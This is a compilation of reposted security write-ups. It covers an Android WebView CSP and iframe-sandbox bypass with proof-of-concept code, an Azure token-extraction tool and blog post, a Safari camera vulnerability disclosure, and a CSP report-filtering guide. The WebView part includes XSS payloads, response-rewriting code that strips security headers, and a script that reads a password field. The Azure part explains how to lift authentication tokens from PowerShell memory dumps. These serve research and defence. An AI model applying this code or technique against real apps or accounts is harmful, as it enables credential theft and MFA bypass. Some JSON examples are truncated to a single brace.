    03-27 12:29:33.672 26427-26427/com.example.webviewinjection I/chromium: [INFO:CONSOLE(9)] "The XSS Auditor refused to execute a script in 'http://192.168.1.35:31337/home?name=<body onload="f()"><script type="text/javascript">function f(){var button=document.getElementsByName("submit")[0];button.addEventListener("click", function(){ alert("injected 1"); return false; },false);}%3C/script%3E' because its source code was found within the request. The auditor was enabled as the server sent neither an 'X-XSS-Protection' nor 'Content-Security-Policy' header.", source: http://192.168.1.35:31337/home?name=<body onload="f()"><script type="text/javascript">function f(){var button=document.getElementsByName("submit")[0];button.addEventListener("click", function(){ alert("injected 1"); return false; },false);}%3C/script%3E (9)
    

    So, even without any explicit protection mechanisms (like CSP or iframe sandbox), android webview seems to have a default protection mechanism called the XSS Auditor. This, however, has nothing to do with our use case. Moreover, it interferes with our demo as well. Hence, for now, for the sake of this demo, we would make AppAwesome return the X-XSS-Protection HTTP header, as below, to take care of this issue.

    X-XSS-Protection: 0

    Note: As an auxiliary, XSS Auditor would also be accounted for a bypass towards the end of the blog :)

    AppAwesome when accessed now from BullyGiant, while attempting to exploit the XSS:

    ss13-2.png Vanilla AppAwesome Page - Exploited XSS => Android Webview

    Thus we see that the XSS payload works equally well even in the Android Webview (of course with the XSS Auditor intentionally disabled).

    Note: If the victim is the page getting loaded inside the webview, it makes absolute sense that its backend would never return any HTTP headers, like the above, that possibly weaken the security of the page itself. We will see why this is irrelevant further down.

    The other thing to note is that there was a subtle difference between how the payloads were injected into the vulnerable parameter in the two cases, the browser & the webview. It is important to take note of it because it highlights the very premise of this blog post. In the case of the browser, the attacker is an external party, who could send the JS payload to exploit the vulnerable name parameter. In the case of the android webview, the underlying app itself is the malicious actor & hence it injects the JS payload into the vulnerable name parameter before loading the page in its own webview. This difference would be more prominent when we analyze further cases & how the malicious app leverages its capabilities to exploit the page loaded in the webview.

    With CSP Implemented

    Apps used in this section:

    1. AppAwesome
    2. BullyGiant (with XSS payload)
    3. BullyGiant (with CSP bypass)
    4. BullyGiant (with CSP bypass reading the password field)

    Browser

    With the appropriate CSP headers in place, inline JS does not work in browsers as we saw above. What would happen if javascript is injected in the page that has CSP headers? Would it still have CSP violation errors?

    AppAwesome, with vulnerable name parameter & XSS-Auditor disabled, when accessed in the browser & the name query param exploited with the same XSS payload (as earlier):

    ss16.png CSP AppAwesome Page - Exploited XSS => Firefox

    The console error messages are the same as with inline JS. Injected JS does not get executed as the CSP policy prevents it. Would the same XSS payload work when the above CSP page is loaded inside Android Webview?

    AppAwesome when accessed from BullyGiant app that injects the JS payload in the vulnerable name parameter before loading the page in the android webview:

    ss15.png CSP AppAwesome Page - Exploited XSS => Android Webview

    The same adb log is produced confirming that CSP works well in case of even injected javascript payload inside a webview.

    Note: In the CSP related examples above (browser or webview) note that CSP kicks in before the page actually gets loaded.

    With the above note, some interrelated questions that arise are:

    1. What would happen if BullyGiant wanted to access the contents of the page after it gets successfully loaded?
    2. Could it add javascript to the already loaded page, as if this were being done locally?
    3. Would CSP still interfere?

    Since the webview is under the total control of the underlying app, in our case BullyGiant, & since there are android APIs available to control the lifecycle of pages loaded inside the webview, BullyGiant can pretty much do whatever it wants with the loaded page's contents. So instead of injecting the javascript payload into the vulnerable parameter, as in the above example, BullyGiant may choose to inject it directly into the page itself after the page is loaded, without needing to exploit the vulnerable name parameter at all.

    AppAwesome when accessed from BullyGiant that implements the above trick to achieve JS execution despite CSP:

    ss16-2.png CSP AppAwesome Page - Exploited XSS => Android Webview

    The logs still show the below message:

    03-28 17:29:28.372 13282-13282/com.example.webviewinjection D/WebView Console Error:: Refused to execute inline script because it violates the following Content Security Policy directive: "script-src 'self' http://192.168.1.35:31337". Either the 'unsafe-inline' keyword, a hash ('sha256-JkQD9ejf-ohUEh1Jr6C22l1s4TUkBIPWNmho0FNLGr0='), or a nonce ('nonce-...') is required to enable inline execution.
    03-28 17:29:28.396 13282-13282/com.example.webviewinjection D/WebView Console Error:: Refused to execute inline event handler because it violates the following Content Security Policy directive: "script-src 'self' http://192.168.1.35:31337". Either the 'unsafe-inline' keyword, a hash ('sha256-...'), or a nonce ('nonce-...') is required to enable inline execution.
    

    BullyGiant still injected the XSS payload into the vulnerable name parameter (we left it there to ensure that CSP was still in action). The above logs are a result & proof of that.

    Code snippet from BullyGiant that does the trick:

            ...
            mywebview.setWebViewClient(new WebViewClient(){
                @Override
                public void onPageFinished(WebView view, String url) {
                    super.onPageFinished(view, url);
                    mywebview.loadUrl(
                            "javascript:var button = document.getElementsByName(\"submit\")[0];button.addEventListener(\"click\", function(){ alert(\"injected 1\"); },false);"
                    );
                }
            });
            ...
    

    The above PoC shows execution of simple JS payload that just pops up an alert box. Any other more complex JS could be executed as well, like reading the contents of the password field on the page using the below payload

    var secret = document.getElementById("password").value; alert(secret);

    AppAwesome when accessed from BullyGiant that attempts to read the password field using the above payload:

    ss17.png CSP AppAwesome Page - Exploited XSS => Android Webview

    So the questions above get answered. Also, it is indicative of an even more interesting question now:

    Since BullyGiant is in total control of the webview & thus of the page loaded within it, would it also be able to modify the whole HTTP response itself?

    We will tackle the above question with yet another example. In fact, this time we would talk about the second suggestion, around the iframe sandbox, and see if the answer to the above question can be demoed with that. Also, we had left out the whole X-XSS-Protection header thing for later. That part will also get covered in the following experiments.

    Iframe sandbox attribute

    Apps used in this section:

    1. AppAwesome Backend (without CSP & with iframe sandbox)
    2. AppAwesome Backend (without CSP & with iframe sandbox relaxed)
    3. BullyGiant

    AppAwesome, that has no CSP headers, that has X-XSS-Protection relaxed & has the below sandbox attributes

    sandbox="allow-scripts allow-top-navigation allow-forms allow-popups"
    

    when loaded in the browser:

    ss17-1.png AppAwesome Page - Iframe Sandbox => Browser

    The child page has the form which when submitted displays the password on the checkout page inside the iframe as:

    ss18.png AppAwesome Page - Iframe Sandbox => Browser

    The Access button tries to read the password displayed inside iframe by reading the DOM of the page loaded in the iframe using the below JS

    ...
      	<script type="text/javascript">
      		function accessIframe()
      		{
      			document.getElementById('myIframe').style.background = "green"  			
      			alert(document.getElementById('myIframe').contentDocument.getElementById('data').innerText);
      		}
      	</script>
    ...
    

    Note that even in the absence of CSP headers clicking the Access button gives:

    ss19.png AppAwesome Page - Iframe Sandbox => Browser

    The console message is:

    TypeError: document.getElementById(...).contentDocument is null
    

    This happens because of the iframe's sandbox attribute. The iframe sandbox can be relaxed by using:

    <iframe src="http://192.168.1.34:31337/child?secret=iframeData" frameborder="10" id="myIframe" sandbox="allow-same-origin allow-top-navigation allow-forms allow-popups">
    

    AppAwesome, with relaxed iframe sandbox attribute, allows the JS in the parent page to access the iframe's DOM, thus producing the alert box as expected, with the mysecret value:

    ss20.png AppAwesome Page - Iframe Sandbox => Browser

    Also, just a side note, using the below would have also relaxed the sandbox to the exact same effect as has also been mentioned here:

    <iframe src="http://192.168.1.34:31337/child?secret=iframeData" frameborder="10" id="myIframe" sandbox="allow-scripts allow-same-origin allow-top-navigation allow-forms allow-popups">
    

    Repeating the same experiment on android webview again produces the exact same results.

    AppAwesome, with relaxed iframe sandbox attribute when accessed from BullyGiant

    ss22.png AppAwesome Page - Iframe Sandbox Relaxed=> Android Webview

    AppAwesome, that has no CSP headers, that has X-XSS-Protection relaxed & has the below sandbox attributes

    sandbox="allow-scripts allow-top-navigation allow-forms allow-popups"
    

    when accessed from BullyGiant:

    ss21.png AppAwesome Page - Iframe Sandbox => Android Webview

    The error message in the console is:

    03-29 15:18:38.292 11081-11081/com.example.webviewinjection D/WebView Console Error:: Uncaught SecurityError: Failed to read the 'contentDocument' property from 'HTMLIFrameElement': Sandbox access violation: Blocked a frame at "http://192.168.1.34:31337" from accessing a frame at "http://192.168.1.34:31337".  The frame being accessed is sandboxed and lacks the "allow-same-origin" flag.
    

    Now if BullyGiant were to bypass the above restriction, like it did in the case of CSP bypass, it could again take the same route of injecting some javascript inside the iframe itself after the checkout page is loaded.

    Note: I haven't personally tried this approach, but conceptually it should work. Too lazy to do that right now !

    But instead of doing that, what if BullyGiant were to take an even simpler approach and bypass everything once & for all? Since the webview is under the total control of BullyGiant, could it not intercept the response before rendering it in the webview and remove all the troublemaking headers altogether?

    Manipulation of the HTTP response

    Apps used in this section:

    1. AppAwesome Backend (with all protection mechanisms in place)
    2. BullyGiant (that bypasses all the above mechanisms)
    3. BullyGiant app with a toast

    Let's make this case the most secure out of all the previous ones. So this time the AppAwesome implements all secure mechanisms on the page. Below is a list of such changes:

    1. It uses CSP => so that no unwanted JS (inline or injected) could be executed.
    2. It uses strict iframe sandbox attributes => so that the parent page can not access the contents of the iframe despite them being from the same domain.
    3. It does not set the X-XSS-Protection: 0 header => this was an assumption we had made above for the sake of our demos. In the real world, an app that wishes to avoid an XSS scenario would deploy every possible/feasible mechanism to prevent it from happening. So AppAwesome now does not return this header at all.
    4. It does not have the Access button on the DOM with the inline JS => again something that we had used in few of our (most recent) previous examples for the sake of our demo. In the real world, in the context of our story, it would not make sense for AppAwesome to leave an Access button with the supporting inline JS to access the iframe.

    AppAwesome when accessed from the browser:

    ss21-3.png AppAwesome Page - FullBlown => Browser

    Notice that all the security measures mentioned in the pointers above are implemented. CSP headers are in place, there's no Access button or the supporting inline JS, no X-XSS-Protection header & the strict iframe sandbox attribute is present as well.

    BullyGiant deals with all of the above troublemakers by manipulating everything before any response is rendered onto the webview at all.

    catBoss.jpg AppAwesome 0 BullyGiant 1 !

    AppAwesome when accessed from BullyGiant:

    ss22-1.png AppAwesome Page - FullBlown => Android Webview

    Notice that the X-XSS-Protection: 0 header has been added! The CSP header is no longer present! And there's the (old familiar) brand new Access button on the page as well. Clicking the Access button after the form inside the iframe is loaded gives:

    ss25.png AppAwesome Page - FullBlown => Android Webview

    Code snippet from BullyGiant that does all the above trick:

    ...
    class ChangeResponse implements Interceptor {
        @Override public Response intercept(Interceptor.Chain chain) throws IOException {
            Response originalResponse = chain.proceed(chain.request());
            String responseString = originalResponse.body().string();
            Document doc = Jsoup.parse(responseString);
            doc.getElementById("myIframe").removeAttr("sandbox");
            MediaType contentType = originalResponse.body().contentType();
            ResponseBody body = ResponseBody.create(doc.toString(), contentType);
    
            return originalResponse.newBuilder()
                    .body(body)
                    .removeHeader("Content-Security-Policy")
                    .header("X-XSS-Protection", "0")
                    .build();
        }
    };
    ...
    ...
        private WebResourceResponse handleRequestViaOkHttp(@NonNull String url) {
            try {
                final OkHttpClient client = new OkHttpClient.Builder()
                        .addInterceptor(new LoggingInterceptor())
                        .addInterceptor(new ChangeResponse())
                        .build();
    
                final Call call = client.newCall(new Request.Builder()
                        .url(url)
                        .build()
                );
    
                final Response response = call.execute();
                return new WebResourceResponse("text/html", "utf-8",
                        response.body().byteStream()
                );
            } catch (Exception e) {
                return null; // return response for bad request
            }
        }
    ...
    ...
           mywebview.setWebViewClient(new WebViewClient(){
                @SuppressWarnings("deprecation") // From API 21 we should use another overload
                @Override
                public WebResourceResponse shouldInterceptRequest(@NonNull WebView view, @NonNull String url) {
                    return handleRequestViaOkHttp(url);
                }
    ...
    

    What the above does is intercept the HTTP request that the webview would make & pass it over to OkHttp, which then handles all the HTTP requests & responses from that point on, before finally returning the modified HTTP response to the webview.
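    Conceptually, the interceptor's job boils down to a few lines. The sketch below (Python, purely illustrative of the header/body rewriting, not the app's actual OkHttp/Jsoup code) strips the CSP header, disables the XSS auditor, and removes the sandbox attribute from any iframe in the body:

```python
import re

def strip_protections(headers, body):
    """Drop CSP, disable the XSS auditor, and un-sandbox iframes."""
    # Remove the Content-Security-Policy header (case-insensitive).
    headers = {k: v for k, v in headers.items()
               if k.lower() != "content-security-policy"}
    # Tell the webview's built-in XSS auditor to stand down.
    headers["X-XSS-Protection"] = "0"
    # Strip sandbox="..." from the HTML before the webview renders it.
    body = re.sub(r'\ssandbox="[^"]*"', "", body)
    return headers, body
```

    The page then arrives at the webview looking as if it never had any of those protections in the first place.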

    Ending note:

    Before we end, a final touch. BullyGiant was able to access the whole of the page loaded inside the webview. This was demoed using JS alerts on the page itself. The content read from the webview could also be displayed as native toast messages, to make it more convincing for the business leaders (or anyone else), accentuating that the sensitive details from AppAwesome are actually leaked over to BullyGiant.

    AppAwesome when accessed from BullyGiant:

    ss26.png AppAwesome Page - FullBlown => Android Webview - Raising a toast!

    Conclusion

    Since the webview is under the total control of the underlying android app, it is wise not to share any sensitive data on a page that gets loaded inside a webview.

    Collected on the way

    git worktrees
    what are git tags & how to maintain different versions using tags
    creating git tags
    checking out git tags
    pushing git tags
    tags can be viewed simply with git tag
    git tags can not be committed to => for any changes to a tag, commit the changes on the same or a new branch and then make a tag out of it. Delete the old tag after that if you want
    deleting a branch local & remote
    rename a branch local & remote
    adding chrome console messages to adb logs
    chrome's remote debugging feature

     

    Sursa: http://www.nuckingfoob.me/android-webview-csp-iframe-sandbox-bypass/index.html

  7. AzureTokenExtractor

    Extracts Azure authentication tokens from PowerShell process minidumps. For more information on Azure authentication tokens and the process for using this tool, check out the corresponding blog post at https://www.lares.com/blog/hunting-azure-admins-for-vertical-escalation-part-2/.

    Usage

    USAGE:
      python3 azure-token-extractory.py [OPTIONS]
    
    OPTIONS:
      -d, --dump        Target minidump file
      -o, --outfile     File to save extracted Azure context
    

     

    Sursa: https://github.com/LaresLLC/AzureTokenExtractor

  8. Hunting Azure Admins for Vertical Escalation: Part 2

     

     

    This post is part 2 in the Hunting Azure Admins for Vertical Escalation series. Part 1 of this series detailed the usage and functionality of Azure authentication tokens, file locations that cache the tokens during a user session (“%USERPROFILE%\.Azure\TokenCache.dat”), methods for locating user exported Azure context files containing tokens, and leveraging them to bypass password authentication, as well as, multi-factor authentication. This blog post will focus on methodology to extract Azure authentication tokens when the end-user is disconnected and hasn’t exported an Azure context file.

    Disconnected Azure PowerShell Sessions

    When a user connects to Azure from PowerShell, a TokenCache.dat file is created and populated with the user’s Azure authentication token. This is detailed at great lengths in Part 1. However, if the user disconnected their Azure session, the TokenCache.dat file is stripped of the token. So, obtaining an Azure cached token from the TokenCache.dat file requires an active logged-in session.

    1-azadmin-connect-query-disconnect.png

    2-token-dat-empty-after-disconnect.png

    So, what can be done in a scenario where the Azure PowerShell session is disconnected, and the user hasn’t saved an Azure context file to disk?

    PowerShell Process Memory

    Thinking about traditional Windows credential theft and lateral movement brought to mind the LSASS.exe process and Mimikatz. In short, Windows has historically stored hashed and cleartext account credentials in the LSASS.exe process memory space and penetration testers have leveraged tools like Mimikatz to extract those credentials. This has gone on for years and has forced Microsoft into developing new security controls around the storage and access of credentials in Windows. On newer Windows systems, you will likely only extract hashed credentials from accounts that are actively logged onto the machine, as Windows has improved its scrubbing of credentials from memory after a user disconnects.

    This leads to the PowerShell process and identifying information it maintains in memory. Let’s start by dumping the PowerShell process memory to disk in minidump format.

    3-dump-powershell-process-to-minidump-fi

Although we used a custom tool, SnappyKatz, to dump the PowerShell process memory, other publicly available tools can do this as well, such as ProcDump from the Sysinternals Suite. We can then use our favorite hex editor to explore the contents of the dump. Referring back to the contents of the TokenCache.dat file, we can quickly search for keywords to locate the Azure context JSON in the dump.

    4-locating-azure-context-json-in-process

    This is great, but the required CacheData field that would contain the base64 encoded cached token was empty. At first, it was thought the field was empty because the session had been disconnected and due diligence had been done on the part of Microsoft to remove sensitive information from memory. In true Microsoft fashion, the missing cached token data was identified, in full, at a different offset in the dump.

    5-locating-cached-token-in-process-dump.

    We had now located the two pieces of information needed to reconstruct an Azure context file. To create the context file, we saved the JSON context data found at the first location to a file and populated the CacheData field with the base64 encoded token cache located at the second location.

    Automating Extraction

    In order to save a tremendous amount of time on engagements, we created a tool in Python that automates the extraction of required data and properly exports it to a usable Azure context JSON file.

    6-extract-context-and-token-then-export.

    This tool produces the following Azure context JSON output:

    7-azure-context-output.png

    The last step is to import the extracted Azure context file and see if we are able to access Azure.

    8-import-and-use-extracted-azure-context

    As we can see, Azure access has been obtained, leveraging disconnected session tokens extracted from PowerShell process memory. To make it easy to replicate our findings, we’ve published the AzureTokenExtractor tool to extract Azure authentication tokens from PowerShell process minidumps.

    We hope you have enjoyed this blog post. Keep checking back as we add more research, tool, and technique-related posts in the future!

     

    Sursa: https://www.lares.com/blog/hunting-azure-admins-for-vertical-escalation-part-2

  9. iPhone Camera Hack

I discovered a vulnerability in Safari that allowed unauthorized websites to access your camera on iOS and macOS

     

    Imagine you are on a popular website when all of a sudden an ad banner hijacks your camera and microphone to spy on you. That is exactly what this vulnerability would have allowed.

     

    This vulnerability allowed malicious websites to masquerade as trusted websites when viewed on Desktop Safari (like on Mac computers) or Mobile Safari (like on iPhones or iPads).

     

    Hackers could then use their fraudulent identity to invade users' privacy. This worked because Apple lets users permanently save their security settings on a per-website basis.

     

    If the malicious website wanted camera access, all it had to do was masquerade as a trusted video-conferencing website such as Skype or Zoom.

    badads.png

    Is an ad banner watching you?

     

    I posted the technical details of how I found this bug in a lengthy walkthrough here.

     

    My research uncovered seven zero-day vulnerabilities in Safari (CVE-2020-3852, CVE-2020-3864, CVE-2020-3865, CVE-2020-3885, CVE-2020-3887, CVE-2020-9784, & CVE-2020-9787), three of which were used in the kill chain to access the camera.

     

    Put simply - the bug tricked Apple into thinking a malicious website was actually a trusted one. It did this by exploiting a series of flaws in how Safari was parsing URIs, managing web origins, and initializing secure contexts.

     

    If a malicious website strung these issues together, it could use JavaScript to directly access the victim's webcam without asking for permission. Any JavaScript code with the ability to create a popup (such as a standalone website, embedded ad banner, or browser extension) could launch this attack.

     

    I reported this bug to Apple in accordance with the Security Bounty Program rules and used BugPoC to give them a live demo. Apple considered this exploit to fall into the "Network Attack without User Interaction: Zero-Click Unauthorized Access to Sensitive Data" category and awarded me $75,000.

     

    The below screen recording shows what this attack would look like if clicked from Twitter.

    macos-poc.gif
    ios-poc.gif

    * victim in screen recording has previously trusted skype.com

     

    Sursa: https://www.ryanpickren.com/webcam-hacking-overview

  10. Filtering the Crap, Content Security Policy (CSP) Reports

    13 days ago

    Stuart Larsen #article


     

    It's pretty well accepted that if you collect Content Security Policy (CSP) violation reports, you're going to have to filter through a lot of confusing and unactionable reports.

    But it's not as bad as it used to be. Things are way better than they were six years ago when I first started down the CSP path with Caspr. Browsers and other User Agents are way more thoughtful on what and when they report. And new additions to CSP such as "script-sample" have made filtering reports pretty manageable.

    This article will give a quick background, and then cover some techniques that can be used to filter Content Security Policy reports.

    What is a Content Security Policy report?

    If you're new to Content Security Policy, I'd recommend checking out An Introduction To Content Security Policy first.

    Content Security Policy has a nifty feature called report-uri. When report-uri is enabled the browser will send a JSON blob whenever the browser detects a violation from the CSP. (For more info: An Introduction to report-uri). That JSON blob is the report.

    Here's a random violation report from my personal website https://c0nrad.io:

    {
     

    Report: Violation report from c0nrad.io on an inline style

    The report has a number of tasty details:

    • blocked-uri: inline. The blocked-uri was an 'inline' resource
    • violated-directive: style-src-elem. The violated directive was a CSS style element (it means <style> block as opposed to "style=" attr (attribute) on an HTML element)
    • source-file / line-number: https://c0nrad.io/ / 8. The inline resource came from file https://c0nrad.io on line 8. If you view-source of https://c0nrad.io, it's still there
• script-sample: .something { width: 100%}. The first 40 characters are .something { width: 100%}.

    These reports are a miracle when getting started with CSP. You can use them to quickly determine where your policy is lacking. You can even use it to build new policies from scratch. It's actually how tools like CSP Generator automatically build new content security policies. Just by parsing these reports.
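An endpoint's first step is just pulling these fields out of the posted JSON. A minimal sketch, using the fields from the c0nrad.io report above:

```python
import json

def summarize(report_body):
    # Extract the actionable fields from a CSP violation report.
    report = json.loads(report_body).get("csp-report", {})
    return {
        "blocked": report.get("blocked-uri"),
        "directive": report.get("violated-directive"),
        "source": report.get("source-file"),
        "line": report.get("line-number"),
        "sample": (report.get("script-sample") or "")[:40],
    }

body = json.dumps({"csp-report": {
    "blocked-uri": "inline",
    "violated-directive": "style-src-elem",
    "source-file": "https://c0nrad.io/",
    "line-number": 8,
    "script-sample": ".something { width: 100%}",
}})
print(summarize(body)["directive"])  # style-src-elem
```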

    Why filter Content Security Policy reports?

If the violation reports are so amazing, why do we want to filter them? It seems a little counterintuitive at first, but the sad reality is that not all reports are created equal.

Here are some of the inline reports that Csper has received on its own policy. Only three of them are from a real inline script in Csper (which I purposely injected):

    Sample CSP Violation Reports

    Figure: Sample violation reports generated by Content Security Policy

    For more fun, I highly recommend checking out this amazing list of fun CSP reports: csp-wtf

What's frustrating is that a large percentage of reports received from CSP are unactionable; they're not really related to the website. These unactionable reports can come from a lot of different places. The most common source is extensions and addons. There are also ads, content injected by ISPs, malware, corporate proxies, custom user scripts, browser quirks, and a sprinkle of serious "wtf" reports.

    Filtering Techniques

The goal of filtering is to remove the unactionable reports, so that you're only left with reports that should be looked into. But of course you don't want to filter so much that you lose reports that really should have been analyzed (such as an XSS on your website).

The techniques below are listed roughly in order of importance, ease, and reliability.

    Blacklists

The easiest way to filter out a huge number of reports is by applying some simple blacklisting rules.

    I think everyone either directly or indirectly has taken a page from Neil Matatall's/Twitter's book back in 2014: https://matatall.com/csp/twitter/2014/07/25/twitters-csp-report-collector-design.html

    Some more lists:

Depending on your use case, it may be better to classify them, and then selectively filter out those classifications later (just in case you actually need the reports). Some buckets I found to work well are 'extension' and 'unactionable'.

    But this technique alone cuts out ~50% of the weird reports.
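A blacklist pass can be as simple as prefix rules over blocked-uri and source-file. A sketch with illustrative rules (not Twitter's actual list):

```python
BLACKLIST_PREFIXES = (
    # Illustrative extension/addon schemes; a real list would be longer.
    "chrome-extension://",
    "moz-extension://",
    "safari-extension://",
    "ms-browser-extension://",
)

def blacklist_bucket(report):
    # Return a bucket label for an obviously unactionable report, else None.
    for field in ("blocked-uri", "source-file"):
        value = report.get(field) or ""
        if value.startswith(BLACKLIST_PREFIXES):
            return "extension"
    return None
```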

    Malformed Reports

Another easy way to filter reports is to make sure they have all the necessary fields (and that fields like effective-directive actually contain a real directive). If a report is missing some fields, it's probably not worth the time investigating; it likely came from a very old or incomplete user agent. All the fields can be found in the CSP3 spec.

    {
     

You could argue that the users being XSS'ed might be on a very old browser that doesn't correctly report all fields, so filtering those reports out could cause you to miss the XSS that needs to be patched. Which is definitely fair. But with browser auto-updating, I think (and hope) most people are on a decently recent browser. Also (and this should not be a full excuse not to care), people on very outdated browsers probably have a large number of other browser problems to worry about. And if multiple users are being XSS'ed, the majority of them are probably on a competent user agent that will report all the fields, so the issue will still be picked up.

It comes down to how much time/resources an organization has to dedicate to CSP. Something is better than nothing, and in this case, this something can save you hours, for a pretty small chance of something falling through the cracks. I recommend labeling reports that are missing important fields (or using egregious values) as 'malformed', and just keeping them to the side so they can be skimmed every once in a while.
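The 'malformed' label can be assigned with a simple field check. A sketch (the directive set below is only a subset of the real CSP3 directive names):

```python
REQUIRED_FIELDS = {"document-uri", "blocked-uri", "violated-directive",
                   "original-policy"}
# Subset of real CSP3 directive names, enough for the sketch.
KNOWN_DIRECTIVES = {"default-src", "script-src", "script-src-elem",
                    "style-src", "style-src-elem", "img-src", "connect-src",
                    "font-src", "frame-src", "object-src", "base-uri"}

def is_malformed(report):
    # Missing required fields, or a made-up directive name => malformed.
    if not REQUIRED_FIELDS.issubset(report):
        return True
    directive = report.get("effective-directive") or report["violated-directive"]
    return directive not in KNOWN_DIRECTIVES
```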

    Bots

Another easy way to filter out 'unactionable' reports is to check whether the User Agent belongs to a bot. A number of web scrapers inject JavaScript into the pages they are analyzing (and the bots also have CSP enabled). This seems silly at first, but they're probably just using headless Chrome or something similar.

    Some example user agents:

    Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BuiltWith/1.0; +http://builtwith.com/biup) Chrome/60.0.3112.50 Safari/537.36
    Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/61.0.3163.59 Safari/537.36 Prerender (+https://github.com/prerender/prerender)
    Mozilla/5.0 (compatible; woorankreview/2.0; +https://www.woorank.com/)
    Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)
    
     

Since these user agents inject their own JavaScript, unrelated to the website, it's not worth the time investigating them.
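A bot check can be a single regex over the User-Agent string. A sketch built from the sample user agents above plus a few generic markers:

```python
import re

# Markers drawn from the sample user agents above, plus generic bot terms.
BOT_RE = re.compile(
    r"HeadlessChrome|Prerender|BuiltWith|woorank|bot|crawler|spider",
    re.IGNORECASE)

def is_bot(user_agent):
    # True when the UA looks like a scraper/crawler rather than a person.
    return BOT_RE.search(user_agent) is not None
```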

    Script-Sample

If report-sample is enabled (which I highly recommend), you can start filtering reports based on the first 40 characters in the script-sample field.

    A good starting point is the csp-wtf list.

A quick note of caution, though, for websites running in 'Content-Security-Policy-Report-Only' mode: if you automatically filter out anything that matches these script-samples, an attacker could use an XSS payload that starts with one of those strings to avoid detection. If it's a DOM-based XSS, it will be very hard to tell an injection apart from the XSS (more on that later).
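The prefix match itself is trivial; the caution above is why the result should down-rank a report rather than delete it. A sketch with hypothetical noise prefixes in the spirit of the csp-wtf list (not actual entries):

```python
# Hypothetical noise prefixes, illustrative only.
NOISE_SAMPLE_PREFIXES = (
    "var BlockAdBlock",
    "try { window.AG_onLoad",
    ";(function installGlobalHook",
)

def noisy_sample(report):
    # Caution: on Report-Only deployments an attacker can mimic a known
    # prefix, so treat a match as down-ranking, not hard deletion.
    sample = report.get("script-sample") or ""
    return sample.startswith(NOISE_SAMPLE_PREFIXES)
```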

    Browser Age

One filtering technique that Csper started supporting this week is filtering on browser age. Older browsers (and less common browsers) have some fun CSP quirks (and sadly probably more malware, toolbars, etc., which all cause unactionable reports), so if you're short on resources, these reports should probably get less attention.

    So when a report is received, you take the User Agent + Version, look up the release date of that User Agent, and if it's older than some time period (2 years) label it as an older user agent. This cuts out like 15% of the reports.

The same argument still holds: "what if the XSS victim is using an old browser?" Again, I think it's up to the website's security maturity and available resources to determine the appropriate level of effort. But for the average website, giving less attention to browsers older than two years while giving more attention to the rest of the reports, instead of being flooded by reports and doing nothing, is infinitely better. The reports are still there for those who want to look at them.
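The lookup described above (UA family + version => release date => age check) can be sketched like this; the release-date table here is illustrative, and a production endpoint would maintain a full, updated table:

```python
from datetime import date

# Illustrative release dates (assumption for the sketch).
RELEASE_DATES = {
    ("Chrome", 60): date(2017, 7, 25),
    ("Chrome", 80): date(2020, 2, 4),
    ("Firefox", 73): date(2020, 2, 11),
}

def is_old_browser(family, major, today, max_years=2):
    # Label a report's UA as "older" when its release date exceeds the cutoff.
    released = RELEASE_DATES.get((family, major))
    if released is None:
        return True  # unknown/uncommon agents also get less attention
    return (today - released).days > max_years * 365
```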

    line-number / column-number analysis

    Modern browsers make a good attempt to add Line-Number/Column-Number to the violation reports. (The PR for chrome).

So when a resource doesn't have a line-number/column-number, it's good cause for a raised eyebrow. A lot of reports also use "1" or "0" as the line number. These can also be a great signal that something odd is going on.

I found that a line number of 0 or 1 usually signifies that the resource was "injected" after the fact (as in, it was not part of the original HTML). This could be things like SPAs (Angular/React) injecting resources, browsers injecting content scripts, or a DOM-based XSS.

Unfortunately (at least for modern Chrome), I couldn't find a way to tell the difference between a DOM-based XSS and something injected by a browser script.

    For example here's a report of a DOM based XSS I injected myself through an angular innerHTML. It looks pretty much the same as a lot of extension injections with a line-number of 1:

    {
     

     

But it is still interesting when a report has a line-number of 1. So inline reports can be split into the categories "inline" and "injected". The injected bucket will contain most of the browser noise, but could also contain DOM-based XSS's, so it still needs to be looked at.
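The inline/injected split described above can be sketched as a tiny classifier over the line-number field:

```python
def inline_bucket(report):
    # Only applies to blocked inline resources.
    if report.get("blocked-uri") != "inline":
        return "other"
    # Line 0/1 (or missing) usually means the resource was injected after
    # page load: extension content script, SPA framework, or a DOM XSS.
    if report.get("line-number") in (None, 0, 1):
        return "injected"
    return "inline"
```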

    I hope in the future that source-file will better accurately reflect where the javascript came from, and we can filter out all extension stuff with great ease.

    SourceFile / DocumentURI

In a somewhat related vein, stored or reflected XSS's should have a matching source-file/document-uri (obviously not the case for DOM-based or more exotic XSS's). In some of the odd reports, the source file is something external (such as a script from Google Translate).

    If you're specifically looking to detect a stored/reflected XSS, a mismatch can be a nice indication that maybe the report isn't as useful.

    Somewhat related, Firefox also doesn't include sourcefile on eval's from extensions, which can help reduce eval noise. (They can be placed in the extension bucket).

    Other Ideas

    Similar Reports From Newer Browser Versions

    Browsers are getting way better at fully specifying what content came from an extension. For example below it's pretty obvious that this report is from an extension (thanks to the source-file starting with moz-extension). This report came from a Useragent with Firefox/Windows/Desktop released 22 days ago.

    {
     

    The next report most likely came from the same extension, but from the report it's not obvious where the report came from. This UserAgent is Firefox/Windows/Desktop but released 9 months ago.

    {
      "csp-report": {
        "blocked-uri": "inline",
        "column-number": 1,
        "document-uri": "https://csper.io/blog/other-csp-security",
        "line-number": 1,
        "original-policy": "default-src 'self'; connect-src 'self' https://*.hotjar.com https://*.hotjar.io https://api.hubspot.com https://forms.hubspot.com https://rs.fullstory.com https://stats.g.doubleclick.net https://www.google-analytics.com wss://*.hotjar.com; font-src 'self' data: https://script.hotjar.com; frame-src 'self' https://app.hubspot.com https://js.stripe.com https://vars.hotjar.com https://www.youtube.com; img-src 'self' data: https:; object-src 'none'; script-src 'report-sample' 'self' http://js.hs-analytics.net/analytics/ https://edge.fullstory.com/s/fs.js https://js.hs-analytics.net/analytics/ https://js.hs-scripts.com/ https://js.hscollectedforms.net/collectedforms.js https://js.stripe.com/v3/ https://js.usemessages.com/conversations-embed.js https://script.hotjar.com https://static.hotjar.com https://www.google-analytics.com/analytics.js https://www.googletagmanager.com/gtag/js; style-src 'report-sample' 'self' 'unsafe-inline'; base-uri 'self'; report-uri https://csper-prod.endpoint.csper.io/",
        "referrer": "",
        "script-sample": "(() => {\n        try {\n            // co…",
        "source-file": "https://csper.io/blog/other-csp-security",
        "violated-directive": "script-src"
      }
    }
     

